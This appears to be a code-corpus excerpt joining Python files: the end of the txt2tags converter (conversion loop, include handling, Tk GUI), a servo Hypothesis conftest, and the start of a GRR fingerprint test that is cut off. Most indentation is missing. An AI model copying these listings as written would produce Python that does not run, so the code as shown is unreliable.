img_re = regex['img']
term = regex['deflist'].search(line).group(3)
# mask image inside term as (image.jpg), where not supported
if not rules['imgasdefterm'] and img_re.search(term):
while img_re.search(term):
imgfile = img_re.search(term).group(1)
term = img_re.sub('(%s)'%imgfile, term, 1)
#TODO tex: escape ] on term. \], \rbrack{} and \verb!]! don't work :(
return term
def get_tagged_bar(line):
m = regex['bar'].search(line)
if not m: return line
txt = m.group(2)
# set bar type
if txt[0] == '=': bar = TAGS['bar2']
else : bar = TAGS['bar1']
# to avoid comment tag confusion like <!-- ------ -->
if string.count(TAGS['comment'], '--'):
txt = string.replace(txt,'--','__')
# tag line
return regex['x'].sub(txt, bar)
def get_image_align(line):
"Return the image (first found) align for the given line"
# first clear marks that can mess align detection
line = re.sub(SEPARATOR+'$', '', line) # remove deflist sep
line = re.sub('^'+SEPARATOR, '', line) # remove list sep
line = re.sub('^[\t]+' , '', line) # remove quote mark
# get image position on the line
m = regex['img'].search(line)
ini = m.start() ; head = 0
end = m.end() ; tail = len(line)
# the align detection algorithm
if ini == head and end != tail: align = 'left' # ^img + text$
elif ini != head and end == tail: align = 'right' # ^text + img$
else : align = 'middle' # default align
# some special cases
if BLOCK.isblock('table'): align = 'middle' # ignore when table
if TARGET == 'mgp' and align == 'middle': align = 'center'
return align
# reference: http://www.iana.org/assignments/character-sets
# http://www.drclue.net/F1.cgi/HTML/META/META.html
def get_encoding_string(enc, target):
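	# Normalize the encoding name and translate it to the target's keyword
	# (only tex needs a translation table here)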
if not enc: return ''
# target specific translation table
translate = {
'tex': {
# missing: ansinew , applemac , cp437 , cp437de , cp865
'us-ascii' : 'ascii',
'windows-1250': 'cp1250',
'windows-1252': 'cp1252',
'ibm850' : 'cp850',
'ibm852' : 'cp852',
'iso-8859-1' : 'latin1',
'iso-8859-2' : 'latin2',
'iso-8859-3' : 'latin3',
'iso-8859-4' : 'latin4',
'iso-8859-5' : 'latin5',
'iso-8859-9' : 'latin9',
'koi8-r' : 'koi8-r'
}
}
# normalization
enc = re.sub('(?i)(us[-_]?)?ascii|us|ibm367','us-ascii' , enc)
enc = re.sub('(?i)(ibm|cp)?85([02])' ,'ibm85\\2' , enc)
enc = re.sub('(?i)(iso[_-]?)?8859[_-]?' ,'iso-8859-' , enc)
enc = re.sub('iso-8859-($|[^1-9]).*' ,'iso-8859-1', enc)
# apply translation table
try: enc = translate[target][string.lower(enc)]
except: pass
return enc
##############################################################################
##MerryChristmas,IdontwanttofighttonightwithyouImissyourbodyandIneedyourlove##
##############################################################################
def process_source_file(file, noconf=0):
"""
Find and Join all the configuration available for a source file.
	No sanity checking is done at this step.
It also extracts the source document parts into separate holders.
The config scan order is:
1. The user configuration file (i.e. $HOME/.txt2tagsrc)
2. The source document's CONF area
3. The command line options
The return data is a tuple of two items:
1. The parsed config dictionary
2. The document's parts, as a (head, conf, body) tuple
	The whole conversion process is based on the data and
	configuration returned by this function.
	The source file is read at this step only.
"""
source = SourceDocument(file)
head, conf, body = source.split()
Message(_("Source document contents stored"),2)
if not noconf:
# read document config
source_raw = source.get_raw_config()
# join all the config directives found, then parse it
full_raw = RC_RAW + source_raw + CMDLINE_RAW
Message(_("Parsing and saving all config found (%03d items)")%(
len(full_raw)),1)
full_parsed = ConfigMaster(full_raw).parse()
		# manually add the filename to the conf dict
full_parsed['sourcefile'] = file
		# should we dump the config found?
if full_parsed.get('dump-config'):
dumpConfig(source_raw, full_parsed)
sys.exit()
# okay, all done
Debug("FULL config for this file: %s"%full_parsed, 1)
else:
full_parsed = {}
return full_parsed, (head,conf,body)
def get_infiles_config(infiles):
"""Find and Join into a single list, all configuration available
for each input file. This function is supposed to be the very
first one to be called, before any processing.
"""
ret = []
if not infiles: return []
for infile in infiles:
ret.append((process_source_file(infile)))
return ret
def convert_this_files(configs):
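	# For each (config, document) pair: compose header, body, TOC and footer,
	# then return the result when on GUI or write it out via finish_him()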
global CONF
for myconf,doc in configs: # multifile support
target_head = []
target_toc = []
target_body = []
target_foot = []
source_head, source_conf, source_body = doc
myconf = ConfigMaster().sanity(myconf)
# compose the target file Headers
#TODO escape line before?
#TODO see exceptions by tex and mgp
Message(_("Composing target Headers"),1)
target_head = doHeader(source_head, myconf)
# parse the full marked body into tagged target
first_body_line = (len(source_head) or 1)+ len(source_conf) + 1
Message(_("Composing target Body"),1)
target_body, marked_toc = convert(source_body, myconf,
firstlinenr=first_body_line)
# make TOC (if needed)
Message(_("Composing target TOC"),1)
target_toc = toc_maker(marked_toc,myconf)
# compose the target file Footer
Message(_("Composing target Footer"),1)
target_foot = doFooter(myconf)
# finally, we have our document
outlist = target_head + target_toc + target_body + target_foot
# if on GUI, abort before finish_him
# else, write results to file or STDOUT
if GUI:
return outlist, myconf
else:
Message(_("Saving results to the output file"),1)
finish_him(outlist, myconf)
def parse_images(line):
"Tag all images found"
while regex['img'].search(line) and TAGS['img'] != '[\a]':
txt = regex['img'].search(line).group(1)
tag = TAGS['img']
# HTML, XHTML and mgp!
if rules['imgalignable']:
align = get_image_align(line)
# add align on tag
tag = regex['_imgAlign'].sub(align, tag, 1)
# dirty fix to allow centered solo images
if align == 'middle' and TARGET in ['html','xhtml']:
rest = regex['img'].sub('',line,1)
if re.match('^\s+$', rest):
tag = "<center>%s</center>" %tag
if TARGET == 'tex': tag = re.sub(r'\\b',r'\\\\b',tag)
line = regex['img'].sub(tag,line,1)
line = regex['x'].sub(txt,line,1)
return line
def add_inline_tags(line):
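	# Apply the bold/italic/underline beautifiers and image tags to a single line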
# beautifiers
for beauti in ['Bold', 'Italic', 'Underline']:
if regex['font%s'%beauti].search(line):
line = beautify_me(beauti, line)
line = parse_images(line)
return line
def get_include_contents(file, path=''):
"Parses %!include: value and extract file contents"
ids = {'`':'verb', '"':'raw', "'":'passthru' }
id = 't2t'
# set include type and remove identifier marks
mark = file[0]
if mark in ids.keys():
if file[:2] == file[-2:] == mark*2:
id = ids[mark] # set type
file = file[2:-2] # remove marks
# handle remote dir execution
filepath = os.path.join(path, file)
# read included file contents
lines = Readfile(filepath, remove_linebreaks=1)
# default txt2tags marked text, just BODY matters
if id == 't2t':
lines = get_file_body(filepath)
lines.insert(0, '%%INCLUDED(%s) starts here: %s'%(id,file))
lines.append('%%INCLUDED(%s) ends here: %s'%(id,file))
return id, lines
def convert(bodylines, config, firstlinenr=1):
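	# Main conversion loop: walk the marked body line by line, handling raw/verb
	# blocks, blank lines, includes, bars, titles, quotes, lists, tables and paragraphs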
# global vars for doClose*()
global TAGS, regex, rules, TARGET, BLOCK, CONF
CONF = config
target = CONF['target']
TAGS = getTags(target)
rules = getRules(target)
regex = getRegexes()
TARGET = target # save for buggy functions that need global
BLOCK = BlockMaster()
MASK = MaskMaster()
TITLE = TitleMaster()
ret = []
f_lastwasblank = 0
# if TOC is a header tag, add it
if CONF['toc'] and TAGS['TOC']:
ret.append(TAGS['TOC']+'\n')
# no forced indent for verbatim block when using CSS
if target in ('html','xhtml') and CONF['css-suggar']:
rules['indentverbblock'] = 0
# let's mark it up!
linenr = firstlinenr-1
lineref = 0
while lineref < len(bodylines):
# defaults
MASK.reset()
results_box = ''
untouchedline = bodylines[lineref]
line = re.sub('[\n\r]+$','',untouchedline) # del line break
# apply PreProc rules
if CONF['preproc']:
errmsg = _('Invalid PreProc filter regex')
for patt,repl in CONF['preproc']:
try : line = re.sub(patt, repl, line)
except: Error("%s: '%s'"% (errmsg,patt))
line = maskEscapeChar(line) # protect \ char
linenr = linenr +1
lineref = lineref +1
Debug(repr(line), 3, linenr) # heavy debug: show each line
# any NOT table line (or comment), closes an open table
if ( BLOCK.isblock('table') or
( BLOCK.isblock('verb') and
BLOCK.prop('mapped') == 'table'
)
) \
and not regex['table'].search(line) \
and not regex['comment'].search(line):
ret.extend(BLOCK.blockout())
# any NOT quote line (or comment) closes all open quotes
if BLOCK.isblock('quote') \
and not regex['quote'].search(line) \
and not regex['comment'].search(line):
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
#-------------------------[ Raw Text ]----------------------
# we're already on a raw block
if BLOCK.block() == 'raw':
# closing raw
if regex['blockRawClose'].search(line):
ret.extend(BLOCK.blockout())
continue
# normal raw-inside line
BLOCK.holdadd(line)
continue
# detecting raw block init
if regex['blockRawOpen'].search(line):
ret.extend(BLOCK.blockin('raw'))
continue
# one line verb-formatted text
if regex['1lineRaw'].search(line):
ret.extend(BLOCK.blockin('raw'))
line = regex['1lineRaw'].sub('',line)
BLOCK.holdadd(line)
ret.extend(BLOCK.blockout())
continue
#-----------------[ Verbatim (PRE-formatted) ]--------------
#TIP we'll never support beautifiers inside verbatim
# we're already on a verb block
if BLOCK.block() == 'verb':
# closing verb
if regex['blockVerbClose'].search(line):
ret.extend(BLOCK.blockout())
continue
# normal verb-inside line
BLOCK.holdadd(line)
continue
# detecting verb block init
if regex['blockVerbOpen'].search(line):
ret.extend(BLOCK.blockin('verb'))
f_lastwasblank = 0
continue
# one line verb-formatted text
if regex['1lineVerb'].search(line):
ret.extend(BLOCK.blockin('verb'))
line = regex['1lineVerb'].sub('',line)
BLOCK.holdadd(line)
ret.extend(BLOCK.blockout())
f_lastwasblank = 0
continue
# tables are mapped to verb when target is not table-aware
if not rules['tableable'] and regex['table'].search(line):
if not BLOCK.isblock('verb'):
ret.extend(BLOCK.blockin('verb'))
BLOCK.propset('mapped', 'table')
BLOCK.holdadd(line)
continue
#---------------------[ blank lines ]-----------------------
if regex['blankline'].search(line):
# close open paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
f_lastwasblank = 1
continue
# close all open quotes
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
# closing all open lists
if f_lastwasblank: # 2nd consecutive blank
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub('') # helps parser
while BLOCK.depth: # closes list (if any)
ret.extend(BLOCK.blockout())
continue # ignore consecutive blanks
# paragraph (if any) is wanted inside lists also
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub('')
else:
# html: show blank line (needs tag)
if target in ['html','xhtml']:
ret.append(TAGS['paragraphOpen']+\
TAGS['paragraphClose'])
# otherwise we just show a blank line
else:
ret.append('')
f_lastwasblank = 1
continue
#---------------------[ special ]---------------------------
if regex['special'].search(line):
# include command
targ, key, val = ConfigLines().parse_line(
line, 'include', target)
if key:
Debug("Found config '%s', value '%s'"%(
key,val),1,linenr)
incpath = os.path.dirname(CONF['sourcefile'])
incfile = val
err = _('A file cannot include itself (loop!)')
if CONF['sourcefile'] == incfile:
Error("%s: %s"%(err,incfile))
inctype, inclines = get_include_contents(
incfile, incpath)
# verb, raw and passthru are easy
if inctype != 't2t':
ret.extend(BLOCK.blockin(inctype))
BLOCK.holdextend(inclines)
ret.extend(BLOCK.blockout())
else:
# insert include lines into body
#TODO del %!include command call
#TODO include maxdepth limit
bodylines = bodylines[:lineref] \
+inclines \
+bodylines[lineref:]
continue
else:
Debug('Bogus Special Line',1,linenr)
#---------------------[ comments ]--------------------------
# just skip them (if not macro or config)
if regex['comment'].search(line) and not \
regex['date'].match(line):
continue
# valid line, reset blank status
f_lastwasblank = 0
#---------------------[ Horizontal Bar ]--------------------
if regex['bar'].search(line):
# a bar closes a paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
# we need to close all opened quote blocks
# if bar isn't allowed inside or if not a quote line
if BLOCK.isblock('quote'):
if not rules['barinsidequote'] or \
not regex['quote'].search(line):
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
# quote + bar: continue processing for quoting
if rules['barinsidequote'] and \
regex['quote'].search(line):
pass
# just quote: save tagged line and we're done
else:
line = get_tagged_bar(line)
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub(line)
elif BLOCK.block():
BLOCK.holdadd(line)
else:
ret.append(line)
continue
#---------------------[ Title ]-----------------------------
#TODO set next blank and set f_lastwasblank or f_lasttitle
if (regex['title'].search(line) or
regex['numtitle'].search(line)) and \
BLOCK.block()[-4:] != 'list':
# a title closes a paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
TITLE.add(line)
ret.extend(TITLE.get())
f_lastwasblank = 1
continue
#---------------------[ apply masks ]-----------------------
line = MASK.mask(line)
#XXX from here, only block-inside lines will pass
#---------------------[ Quote ]-----------------------------
if regex['quote'].search(line):
# store number of leading TABS
quotedepth = len(regex['quote'].search(line).group(0))
# SGML doesn't support nested quotes
if rules['quotenotnested']: quotedepth = 1
# new quote
if not BLOCK.isblock('quote'):
ret.extend(BLOCK.blockin('quote'))
# new subquotes
while BLOCK.depth < quotedepth:
BLOCK.blockin('quote')
# closing quotes
while quotedepth < BLOCK.depth:
ret.extend(BLOCK.blockout())
#---------------------[ Lists ]-----------------------------
if regex['list'].search(line) or \
regex['numlist'].search(line) or \
regex['deflist'].search(line):
listindent = BLOCK.prop('indent')
listids = string.join(LISTNAMES.keys(), '')
m = re.match('^( *)([%s]) '%listids, line)
listitemindent = m.group(1)
listtype = m.group(2)
listname = LISTNAMES[listtype]
results_box = BLOCK.holdadd
# del list ID (and separate term from definition)
if listname == 'deflist':
term = parse_deflist_term(line)
line = regex['deflist'].sub(term+SEPARATOR,line)
else:
line = regex[listname].sub(SEPARATOR,line)
# don't cross depth limit
maxdepth = rules['listmaxdepth']
if maxdepth and BLOCK.depth == maxdepth:
if len(listitemindent) > len(listindent):
listitemindent = listindent
# open mother list or sublist
if BLOCK.block()[-4:] != 'list' or \
len(listitemindent) > len(listindent):
ret.extend(BLOCK.blockin(listname))
BLOCK.propset('indent',listitemindent)
# closing sublists
while len(listitemindent) < len(BLOCK.prop('indent')):
ret.extend(BLOCK.blockout())
#---------------------[ Table ]-----------------------------
#TODO escape undesired format inside table
#TODO add pm6 target
if regex['table'].search(line):
if not BLOCK.isblock('table'): # first table line!
ret.extend(BLOCK.blockin('table'))
BLOCK.tableparser.__init__(line)
tablerow = TableMaster().parse_row(line)
BLOCK.tableparser.add_row(tablerow) # save config
# maintain line to unmask and inlines
line = string.join(tablerow['cells'], SEPARATOR)
#---------------------[ Paragraph ]-------------------------
if not BLOCK.block(): # new para!
ret.extend(BLOCK.blockin('para'))
############################################################
############################################################
############################################################
#---------------------[ Final Parses ]----------------------
# the target-specific special char escapes for body lines
line = doEscape(target,line)
line = add_inline_tags(line)
line = MASK.undo(line)
#---------------------[ Hold or Return? ]-------------------
### now we must choose here to put the parsed line
#
if not results_box:
# list item extra lines
if BLOCK.block()[-4:] == 'list':
results_box = BLOCK.holdaddsub
# other blocks
elif BLOCK.block():
results_box = BLOCK.holdadd
# no blocks
else:
line = doFinalEscape(target, line)
results_box = ret.append
results_box(line)
# EOF: close any open para/verb/lists/table/quotes
Debug('EOF',2)
while BLOCK.block():
ret.extend(BLOCK.blockout())
# if CSS, enclose body inside DIV
if TAGS['bodyOpenCss'] and config['css-suggar']:
ret.insert(0, TAGS['bodyOpenCss'])
ret.append(TAGS['bodyCloseCss'])
if CONF['toc-only']: ret = []
marked_toc = TITLE.dump_marked_toc(CONF['toc-level'])
return ret, marked_toc
##############################################################################
################################### GUI ######################################
##############################################################################
#
# tk help: http://python.org/topics/tkinter/
# /usr/lib/python*/lib-tk/Tkinter.py
#
# grid table : row=0, column=0, columnspan=2, rowspan=2
# grid align : sticky='n,s,e,w' (North, South, East, West)
# pack place : side='top,bottom,right,left'
# pack fill : fill='x,y,both,none', expand=1
# pack align : anchor='n,s,e,w' (North, South, East, West)
# padding : padx=10, pady=10, ipadx=10, ipady=10 (internal)
# checkbox : offvalue is returned if the _user_ deselected the box
# label align: justify=left,right,center
def load_GUI_resources():
"Load all extra modules and methods used by GUI"
global askopenfilename, showinfo, showwarning, showerror, Tkinter
from tkFileDialog import askopenfilename
from tkMessageBox import showinfo,showwarning,showerror
import Tkinter
class Gui:
"Graphical Tk Interface"
def __init__(self, conf={}):
self.root = Tkinter.Tk() # mother window, come to butthead
self.root.title(my_name) # window title bar text
self.window = self.root # variable "focus" for inclusion
self.row = 0 # row count for grid()
		self.action_lenght = 150 # left column length (pixels)
self.frame_margin = 10 # frame margin size (pixel)
self.frame_border = 6 # frame border size (pixel)
# the default Gui colors, can be changed by %!guicolors
self.dft_gui_colors = ['blue','white','lightblue','black']
self.gui_colors = []
self.bg1 = self.fg1 = self.bg2 = self.fg2 = ''
# on Tk, vars need to be set/get using setvar()/get()
self.infile = self.setvar('')
self.target = self.setvar('')
self.target_name = self.setvar('')
# the checks appearance order
self.checks = [
'headers','enum-title','toc','mask-email',
'toc-only','stdout']
# creating variables for all checks
for check in self.checks:
setattr(self, 'f_'+check, self.setvar(''))
# load RC config
self.conf = {}
if conf: self.load_config(conf)
def load_config(self, conf):
self.conf = conf
self.gui_colors = conf.get('guicolors') or self.dft_gui_colors
self.bg1, self.fg1, self.bg2, self.fg2 = self.gui_colors
self.root.config(bd=15,bg=self.bg1)
### config as dic for python 1.5 compat (**opts don't work :( )
def entry(self, **opts): return Tkinter.Entry(self.window, opts)
def label(self, txt='', bg=None, **opts):
opts.update({'text':txt,'bg':bg or self.bg1})
return Tkinter.Label(self.window, opts)
def button(self,name,cmd,**opts):
opts.update({'text':name,'command':cmd})
return Tkinter.Button(self.window, opts)
def check(self,name,checked=0,**opts):
bg, fg = self.bg2, self.fg2
opts.update({
'text':name, 'onvalue':1, 'offvalue':0,
'activeforeground':fg, 'fg':fg,
'activebackground':bg, 'bg':bg,
'highlightbackground':bg, 'anchor':'w'
})
chk = Tkinter.Checkbutton(self.window, opts)
if checked: chk.select()
chk.grid(columnspan=2, sticky='w', padx=0)
def menu(self,sel,items):
return apply(Tkinter.OptionMenu,(self.window,sel)+tuple(items))
	# handy auxiliary functions
def action(self, txt):
self.label(txt, fg=self.fg1, bg=self.bg1,
wraplength=self.action_lenght).grid(column=0,row=self.row)
def frame_open(self):
self.window = Tkinter.Frame(self.root,bg=self.bg2,
borderwidth=self.frame_border)
def frame_close(self):
self.window.grid(column=1, row=self.row, sticky='w',
padx=self.frame_margin)
self.window = self.root
self.label('').grid()
self.row = self.row + 2 # update row count
def target_name2key(self):
name = self.target_name.get()
target = filter(lambda x: TARGET_NAMES[x] == name, TARGETS)
try : key = target[0]
except: key = ''
self.target = self.setvar(key)
def target_key2name(self):
key = self.target.get()
name = TARGET_NAMES.get(key) or key
self.target_name = self.setvar(name)
def exit(self): self.root.destroy()
def setvar(self, val): z = Tkinter.StringVar() ; z.set(val) ; return z
def askfile(self):
ftypes= [(_('txt2tags files'),('*.t2t','*.txt')),
(_('All files'),'*')]
newfile = askopenfilename(filetypes=ftypes)
if newfile:
self.infile.set(newfile)
newconf = process_source_file(newfile)[0]
newconf = ConfigMaster().sanity(newconf, gui=1)
# restate all checkboxes after file selection
#TODO how to make a refresh without killing it?
self.root.destroy()
self.__init__(newconf)
self.mainwindow()
def scrollwindow(self, txt='no text!', title=''):
# create components
win = Tkinter.Toplevel() ; win.title(title)
frame = Tkinter.Frame(win)
scroll = Tkinter.Scrollbar(frame)
text = Tkinter.Text(frame,yscrollcommand=scroll.set)
button = Tkinter.Button(win)
# config
text.insert(Tkinter.END, string.join(txt,'\n'))
scroll.config(command=text.yview)
button.config(text=_('Close'), command=win.destroy)
button.focus_set()
# packing
text.pack(side='left',fill='both')
scroll.pack(side='right',fill='y')
frame.pack()
button.pack(ipadx=30)
def runprogram(self):
global CMDLINE_RAW
# prepare
self.target_name2key()
infile, target = self.infile.get(), self.target.get()
# sanity
if not target:
showwarning(my_name,_("You must select a target type!"))
return
if not infile:
showwarning(my_name,
_("You must provide the source file location!"))
return
# compose cmdline
guiflags = []
real_cmdline_conf = ConfigMaster(CMDLINE_RAW).parse()
if real_cmdline_conf.has_key('infile'):
del real_cmdline_conf['infile']
if real_cmdline_conf.has_key('target'):
del real_cmdline_conf['target']
real_cmdline = CommandLine().compose_cmdline(real_cmdline_conf)
default_outfile = ConfigMaster().get_outfile_name(
{'sourcefile':infile, 'outfile':'', 'target':target})
for opt in self.checks:
val = int(getattr(self, 'f_%s'%opt).get() or "0")
if opt == 'stdout': opt = 'outfile'
on_config = self.conf.get(opt) or 0
on_cmdline = real_cmdline_conf.get(opt) or 0
if opt == 'outfile':
if on_config == STDOUT: on_config = 1
else: on_config = 0
if on_cmdline == STDOUT: on_cmdline = 1
else: on_cmdline = 0
if val != on_config or (
val == on_config == on_cmdline and
real_cmdline_conf.has_key(opt)):
if val:
# was not set, but user selected on GUI
Debug("user turned ON: %s"%opt)
if opt == 'outfile': opt = '-o-'
else: opt = '--%s'%opt
else:
# was set, but user deselected on GUI
Debug("user turned OFF: %s"%opt)
if opt == 'outfile':
opt = "-o%s"%default_outfile
else: opt = '--no-%s'%opt
guiflags.append(opt)
cmdline = [my_name, '-t', target] +real_cmdline \
+guiflags +[infile]
Debug('Gui/Tk cmdline: %s'%cmdline,5)
# run!
cmdline_raw_orig = CMDLINE_RAW
try:
# fake the GUI cmdline as the real one, and parse file
CMDLINE_RAW = CommandLine().get_raw_config(cmdline[1:])
data = process_source_file(infile)
# on GUI, convert_* returns the data, not finish_him()
outlist, config = convert_this_files([data])
# on GUI and STDOUT, finish_him() returns the data
result = finish_him(outlist, config)
			# show outlist in a nice new window
if result:
outlist, config = result
title = _('%s: %s converted to %s')%(
my_name, os.path.basename(infile),
string.upper(config['target']))
self.scrollwindow(outlist, title)
# show the "file saved" message
else:
msg = "%s\n\n %s\n%s\n\n %s\n%s"%(
_('Conversion done!'),
_('FROM:'), infile,
_('TO:'), config['outfile'])
showinfo(my_name, msg)
except ZeroDivisionError: # common error, not quit
pass
except: # fatal error
ShowTraceback()
print _('Sorry! txt2tags-Tk Fatal Error.')
errmsg = '%s\n\n%s\n %s'%(
_('Unknown error occurred.'),
_('Please send the Error Traceback to the author:'),
my_email)
showerror(_('%s FATAL ERROR!')%my_name,errmsg)
self.exit()
CMDLINE_RAW = cmdline_raw_orig
def mainwindow(self):
self.infile.set(self.conf.get('sourcefile') or '')
self.target.set(self.conf.get('target') or \
_('-- select one --'))
outfile = self.conf.get('outfile')
if outfile == STDOUT: # map -o-
self.conf['stdout'] = 1
if self.conf.get('headers') == None:
self.conf['headers'] = 1 # map default
action1 = _("Enter the source file location:")
action2 = _("Choose the target document type:")
action3 = _("Some options you may check:")
action4 = _("Some extra options:")
checks_txt = {
'headers' : _("Include headers on output"),
'enum-title': _("Number titles (1, 1.1, 1.1.1, etc)"),
'toc' : _("Do TOC also (Table of Contents)"),
'mask-email': _("Hide e-mails from SPAM robots"),
'toc-only' : _("Just do TOC, nothing more"),
'stdout' : _("Dump to screen (Don't save target file)")
}
targets_menu = map(lambda x: TARGET_NAMES[x], TARGETS)
# header
self.label("%s %s"%(string.upper(my_name), my_version),
bg=self.bg2, fg=self.fg2).grid(columnspan=2, ipadx=10)
self.label(_("ONE source, MULTI targets")+'\n%s\n'%my_url,
bg=self.bg1, fg=self.fg1).grid(columnspan=2)
self.row = 2
# choose input file
self.action(action1) ; self.frame_open()
e_infile = self.entry(textvariable=self.infile,width=25)
e_infile.grid(row=self.row, column=0, sticky='e')
if not self.infile.get(): e_infile.focus_set()
self.button(_("Browse"), self.askfile).grid(
row=self.row, column=1, sticky='w', padx=10)
# show outfile name, style and encoding (if any)
txt = ''
if outfile:
txt = outfile
if outfile == STDOUT: txt = _('<screen>')
l_output = self.label(_('Output: ')+txt,
fg=self.fg2,bg=self.bg2)
l_output.grid(columnspan=2, sticky='w')
for setting in ['style','encoding']:
if self.conf.get(setting):
name = string.capitalize(setting)
val = self.conf[setting]
self.label('%s: %s'%(name, val),
fg=self.fg2, bg=self.bg2).grid(
columnspan=2, sticky='w')
# choose target
self.frame_close() ; self.action(action2)
self.frame_open()
self.target_key2name()
self.menu(self.target_name, targets_menu).grid(
columnspan=2, sticky='w')
# options checkboxes label
self.frame_close() ; self.action(action3)
self.frame_open()
# compose options check boxes, example:
# self.check(checks_txt['toc'],1,variable=self.f_toc)
for check in self.checks:
# extra options label
if check == 'toc-only':
self.frame_close() ; self.action(action4)
self.frame_open()
txt = checks_txt[check]
var = getattr(self, 'f_'+check)
checked = self.conf.get(check)
self.check(txt,checked,variable=var)
self.frame_close()
# spacer and buttons
self.label('').grid() ; self.row = self.row + 1
b_quit = self.button(_("Quit"), self.exit)
b_quit.grid(row=self.row, column=0, sticky='w', padx=30)
b_conv = self.button(_("Convert!"), self.runprogram)
b_conv.grid(row=self.row, column=1, sticky='e', padx=30)
if self.target.get() and self.infile.get():
b_conv.focus_set()
# as documentation told me
if sys.platform[:3] == 'win':
self.root.iconify()
self.root.update()
self.root.deiconify()
self.root.mainloop()
##############################################################################
##############################################################################
def exec_command_line(user_cmdline=[]):
global CMDLINE_RAW, RC_RAW, DEBUG, VERBOSE, GUI, Error
# extract command line data
cmdline_data = user_cmdline or sys.argv[1:]
CMDLINE_RAW = CommandLine().get_raw_config(cmdline_data)
cmdline_parsed = ConfigMaster(CMDLINE_RAW).parse()
DEBUG = cmdline_parsed.get('debug' ) or 0
VERBOSE = cmdline_parsed.get('verbose') or 0
GUI = cmdline_parsed.get('gui' ) or 0
infiles = cmdline_parsed.get('infile' ) or []
Message(_("Txt2tags %s processing begins")%my_version,1)
# the easy ones
if cmdline_parsed.get('help' ): Quit(USAGE)
if cmdline_parsed.get('version'): Quit(VERSIONSTR)
# multifile haters
if len(infiles) > 1:
errmsg=_("Option --%s can't be used with multiple input files")
for option in ['gui','dump-config']:
if cmdline_parsed.get(option):
Error(errmsg%option)
Debug("system platform: %s"%sys.platform)
Debug("line break char: %s"%repr(LB))
Debug("command line: %s"%sys.argv)
Debug("command line raw config: %s"%CMDLINE_RAW,1)
# extract RC file config
if cmdline_parsed.get('rc') == 0:
Message(_("Ignoring user configuration file"),1)
else:
rc_file = get_rc_path()
if rc_file:
Message(_("Loading user configuration file"),1)
RC_RAW = ConfigLines(file=rc_file).get_raw_config()
Debug("rc file: %s"%rc_file)
Debug("rc file raw config: %s"%RC_RAW,1)
# get all infiles config (if any)
infiles_config = get_infiles_config(infiles)
# is GUI available?
# try to load and start GUI interface for --gui
# if program was called with no arguments, try GUI also
if GUI or not infiles:
try:
load_GUI_resources()
Debug("GUI resources OK (Tk module is installed)")
winbox = Gui()
Debug("GUI display OK")
GUI = 1
except:
Debug("GUI Error: no Tk module or no DISPLAY")
GUI = 0
# user forced --gui, but it's not available
if cmdline_parsed.get('gui') and not GUI:
ShowTraceback()
Error("Sorry, I can't run my Graphical Interface - GUI\n"
"- Check if Python Tcl/Tk module is installed (Tkinter)\n"
"- Make sure you are in a graphical environment (like X)")
# Okay, we will use GUI
if GUI:
Message(_("We are on GUI interface"),1)
		# redefine the Error function to raise an exception instead of sys.exit()
def Error(msg):
showerror(_('txt2tags ERROR!'), msg)
raise ZeroDivisionError
# if no input file, get RC+cmdline config, else full config
if not infiles:
gui_conf = ConfigMaster(RC_RAW+CMDLINE_RAW).parse()
else:
try : gui_conf = infiles_config[0][0]
except: gui_conf = {}
# sanity is needed to set outfile and other things
gui_conf = ConfigMaster().sanity(gui_conf, gui=1)
Debug("GUI config: %s"%gui_conf,5)
# insert config and populate the nice window!
winbox.load_config(gui_conf)
winbox.mainwindow()
# console mode rocks forever!
else:
Message(_("We are on Command Line interface"),1)
# called with no arguments, show error
if not infiles: Error(_('Missing input file (try --help)'))
convert_this_files(infiles_config)
Message(_("Txt2tags finished sucessfuly"),1)
sys.exit(0)
if __name__ == '__main__':
exec_command_line()
# vim: ts=8
|
charlesvdv/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/conftest.py
|
83
|
import platform
import os
from hypothesis import settings, HealthCheck
impl = platform.python_implementation()
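# CI profiles run 1000 examples; the PyPy profiles also suppress the too_slow health check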
settings.register_profile("ci", settings(max_examples=1000))
settings.register_profile("ci_pypy", settings(max_examples=1000,
suppress_health_check=[HealthCheck.too_slow]))
settings.register_profile("pypy", settings(suppress_health_check=[HealthCheck.too_slow]))
settings.load_profile(os.getenv("HYPOTHESIS_PROFILE",
"default" if impl != "PyPy" else "pypy"))
|
dunkhong/grr
|
refs/heads/master
|
grr/core/grr_response_core/lib/fingerprint_test.py
|
2
|
#!/usr/bin/env python
"""Tests for config_lib classes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
from absl.testing import absltest
from grr_response_core.lib import fingerprint
from grr_response_core.lib import package
class FingerprinterTest(absltest.TestCase):
def testReasonableInterval(self):
# Check if the limit on maximum blocksize for processing still holds.
dummy = io.BytesIO(b'')
fp = fingerprint.Fingerprinter(dummy)
big_finger = fingerprint.Finger(None, [fingerprint.Range(0, 1000001)], None)
fp.fingers.append(big_finger)
start, stop = fp._GetNextInterval()
self.assertEqual(0, start)
self.assertEqual(1000000, stop)
def testAdjustments(self):
dummy = io.BytesIO(b'')
fp = fingerprint.Fingerprinter(dummy)
big_finger = fingerprint.Finger(None, [fingerprint.Range(10, 20)], None)
fp.fingers.append(big_finger)
# The remaining range should not yet be touched...
fp._AdjustIntervals(9, 10)
self.assertEqual([fingerprint.Range(10, 20)], fp.fingers[0].ranges)
# Trying to consume into the range. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 9, 11)
# We forgot a byte. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 11, 12)
# Consume a byte
fp._AdjustIntervals(10, 11)
self.assertEqual([fingerprint.Range(11, 20)], fp.fingers[0].ranges)
# Consumed too much. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 11, 21)
# Consume exactly.
fp._AdjustIntervals(11, 20)
self.assertEmpty(fp.fingers[0].ranges)
class MockHasher(object):
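    # Minimal hasher stub that just records every chunk passed to update()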
def __init__(self):
self.seen = b''
def update(self, content): # pylint: disable=g-bad-name
self.seen += content
def testHashBlock(self):
# Does it invoke a hash function?
